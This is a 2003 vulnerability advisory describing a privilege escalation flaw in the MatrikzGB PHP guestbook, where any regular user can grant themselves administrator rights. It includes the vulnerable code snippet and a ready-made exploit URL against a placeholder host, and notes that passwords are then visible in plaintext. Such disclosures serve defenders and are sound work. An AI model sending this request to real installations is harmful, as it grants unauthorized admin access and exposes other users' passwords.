Security hole in MatrikzGB

2003-08-19T00:00:00
ID SECURITYVULNS:DOC:5006
Type securityvulns
Reporter Securityvulns
Modified 2003-08-19T00:00:00

Description

Security hole in MatrikzGB Guestbook
15/8/2003

Vulnerable Versions: Version 2.0 and prior Version 3 (not tested)

Summary: MatrikzGB was written by Thomas Hempel for www.onsite.org. A bug in index.php allows a user with a regular user account to give administrator rights to himself.

Details: The bug is in the user edit function: Every regular user is allowed to chanche rights or do any modifications on existing users. if ($new_username != "" && $new_password != "") { create_user($new_username,$new_password,$new_rights,$entry_index); echo "<tr><th class=\"ok\">Der Benutzer wurde angelegt!";

Example: This is a example how to give administrator rights to yourself.
http://www.target.com/php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass

Comment: When you got administrator rights,you can look up the passwords of all other users,they are in plaintext.

Vendor status: Vendor has been contacted.

by Stephan "mastamorphixx" S. ,member of www.lostkey.org
contact:mastamorphixx@web.de irc.euirc.de #lostkey